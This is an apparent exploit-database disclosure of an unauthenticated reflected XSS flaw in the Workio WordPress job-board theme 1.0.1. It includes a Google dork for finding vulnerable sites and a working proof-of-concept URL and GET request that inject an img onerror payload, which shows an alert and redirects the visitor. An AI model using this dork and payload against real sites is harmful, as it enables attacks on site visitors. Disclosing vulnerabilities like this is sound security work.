[+] Exploit Title: Workio – Job Board WordPress Theme v1.0.1 - Unauthenticated Reflected XSS
[+] Google Dork: inurl:/wp-content/themes/workio/
[+] Date: 2020-06-17
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: ApusWP [ https://themeforest.net/user/apuswp ]
[+] Software Version: 1.0.1
[+] Software Link: https://themeforest.net/item/workio-job-board-wordpress-theme/26699370
[+] Tested on: Debian 10
[+] CVE: 
[+] CWE: CWE-79



### [ Info: ]

[i] An Unauthenticated Reflected XSS vulnerability was discovered in the Workio Job Board theme through 1.0.1 for WordPress.



### [ PoC: ]

[!] https://www.demoapus-wp1.com/workio/jobs-grid-v1/?filter-title=%22%3E%3Cimg%20src=x%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`);window.location=`https://twitter.com/vlad_vector`;%3E

[!] GET /workio/jobs-grid-v1/?filter-title=%22%3E%3Cimg%20src=x%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`);window.location=`https://twitter.com/vlad_vector`;%3E HTTP/1.1
Host: www.demoapus-wp1.com



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector